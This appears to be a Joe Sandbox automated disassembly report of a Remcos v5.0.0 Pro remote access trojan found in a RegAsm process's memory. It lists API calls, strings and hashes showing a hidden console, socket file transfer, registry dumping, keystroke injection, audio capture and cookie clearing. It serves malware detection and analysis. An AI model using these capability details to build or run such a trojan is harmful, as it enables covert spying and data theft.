                                                                                                                            • String ID: dMG$|MG$PG
                                                                                                                            • API String ID: 1356121797-532278878
                                                                                                                            • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                                                                                                            • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                                                                                                            • Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                                                                                                            • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                                                                                                              • Part of subcall function 0041D50F: RegisterClassExA.USER32 ref: 0041D55B
                                                                                                                              • Part of subcall function 0041D50F: CreateWindowExA.USER32 ref: 0041D576
                                                                                                                              • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                                                                                                            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                                                                                                            • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                                                                                                            • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                                                                                                            • TranslateMessage.USER32(?), ref: 0041D4E9
                                                                                                                            • DispatchMessageA.USER32(?), ref: 0041D4F3
                                                                                                                            • GetMessageA.USER32 ref: 0041D500
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                            • String ID: Remcos
                                                                                                                            • API String ID: 1970332568-165870891
                                                                                                                            • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                                                                            • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                                                                                                            • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                                                                            • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                                                                                                            • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                                                                                                            • Opcode Fuzzy Hash: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                                                                                                            • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                                                                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                                                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                                                                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                                                            • _memcmp.LIBVCRUNTIME ref: 00445423
                                                                                                                            • _free.LIBCMT ref: 00445494
                                                                                                                            • _free.LIBCMT ref: 004454AD
                                                                                                                            • _free.LIBCMT ref: 004454DF
                                                                                                                            • _free.LIBCMT ref: 004454E8
                                                                                                                            • _free.LIBCMT ref: 004454F4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                            • String ID: C
                                                                                                                            • API String ID: 1679612858-1037565863
                                                                                                                            • Opcode ID: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                                                                                                            • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                                                                                                            • Opcode Fuzzy Hash: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                                                                                                            • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: tcp$udp
                                                                                                                            • API String ID: 0-3725065008
                                                                                                                            • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                                                                            • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                                                                                                            • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                                                                            • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                                                                                                            APIs
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                                            • ExitThread.KERNEL32 ref: 004018F6
                                                                                                                            • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                                                                                              • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                            • String ID: PkG$XMG$NG$NG
                                                                                                                            • API String ID: 1649129571-3151166067
                                                                                                                            • Opcode ID: e078c7c9cbda6953a0d7630078a0ca70635e59208c1dc12b3786f5993362548f
                                                                                                                            • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                                                                                                            • Opcode Fuzzy Hash: e078c7c9cbda6953a0d7630078a0ca70635e59208c1dc12b3786f5993362548f
                                                                                                                            • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 004079C5
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A0D
                                                                                                                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00407A4D
                                                                                                                            • MoveFileW.KERNEL32 ref: 00407A6A
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00407A95
                                                                                                                            • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                                                                                                              • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                                                                              • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                            • String ID: .part
                                                                                                                            • API String ID: 1303771098-3499674018
                                                                                                                            • Opcode ID: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                                                                                                                            • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                                                                                                            • Opcode Fuzzy Hash: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                                                                                                                            • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                                                                                                            APIs
                                                                                                                            • AllocConsole.KERNEL32 ref: 0041CDA4
                                                                                                                            • GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                                                                                            • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Console$Window$AllocOutputShow
                                                                                                                            • String ID: Remcos v$5.0.0 Pro$CONOUT$
                                                                                                                            • API String ID: 4067487056-2278869229
                                                                                                                            • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                                                                                            • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                                                                                                            • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                                                                                            • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                                                                                                            APIs
                                                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 004199CC
                                                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 004199ED
                                                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00419A0D
                                                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00419A21
                                                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00419A37
                                                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00419A54
                                                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00419A6F
                                                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00419A8B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InputSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3431551938-0
                                                                                                                            • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                                                                                            • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                                                                                                            • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                                                                                            • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __freea$__alloca_probe_16_free
                                                                                                                            • String ID: a/p$am/pm$zD
                                                                                                                            • API String ID: 2936374016-2723203690
                                                                                                                            • Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                                                                                                            • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                                                                                                            • Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                                                                                                            • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                                                                                                            APIs
                                                                                                                            • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413B8B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Enum$InfoQueryValue
                                                                                                                            • String ID: [regsplt]$xUG$TG
                                                                                                                            • API String ID: 3554306468-1165877943
                                                                                                                            • Opcode ID: b730b8f01de3b61de9bdc309d271c932a797a33a56bfebd36572143352d58066
                                                                                                                            • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                                                                                                            • Opcode Fuzzy Hash: b730b8f01de3b61de9bdc309d271c932a797a33a56bfebd36572143352d58066
                                                                                                                            • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                                                                                                            APIs
                                                                                                                            • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                            • __fassign.LIBCMT ref: 1000954F
                                                                                                                            • __fassign.LIBCMT ref: 1000956A
                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1324828854-0
                                                                                                                            • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                            • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                            • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                            • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                            APIs
                                                                                                                            • GetConsoleCP.KERNEL32 ref: 0044B3FE
                                                                                                                            • __fassign.LIBCMT ref: 0044B479
                                                                                                                            • __fassign.LIBCMT ref: 0044B494
                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                                                                                                            • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000), ref: 0044B4D9
                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000), ref: 0044B512
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1324828854-0
                                                                                                                            • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                                                                                            • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                                                                                                            • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                                                                                            • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free
                                                                                                                            • String ID: D[E$D[E
                                                                                                                            • API String ID: 269201875-3695742444
                                                                                                                            • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                                                                                            • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                                                                                                            • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                                                                                            • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.ADVAPI32 ref: 00413D46
                                                                                                                              • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                                                                                              • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                                                                                                                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00413EB4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                            • String ID: xUG$NG$NG$TG
                                                                                                                            • API String ID: 3114080316-2811732169
                                                                                                                            • Opcode ID: 2741ae2de75677ea4f0a6357f0554a3f03cb5b3aca642d15392f9de8a49b04c1
                                                                                                                            • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                                                                                                            • Opcode Fuzzy Hash: 2741ae2de75677ea4f0a6357f0554a3f03cb5b3aca642d15392f9de8a49b04c1
                                                                                                                            • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                                                                                                            APIs
                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                            • String ID: csm
                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                            • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                            • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                            • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                            • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32 ref: 0041363D
                                                                                                                              • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                                                                                                              • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                                                                                                              • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                                                                              • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                                                                            • _wcslen.LIBCMT ref: 0041B763
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                            • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                            • API String ID: 3286818993-122982132
                                                                                                                            • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                                                                                                            • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                                                                                                            • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                                                                                                            • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                                                                              • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                                                                                                                              • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                            • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                            • API String ID: 1133728706-4073444585
                                                                                                                            • Opcode ID: 64fa2848a199bd2a40e0896628174b15822387fc8284c7b97a1890df31b02a60
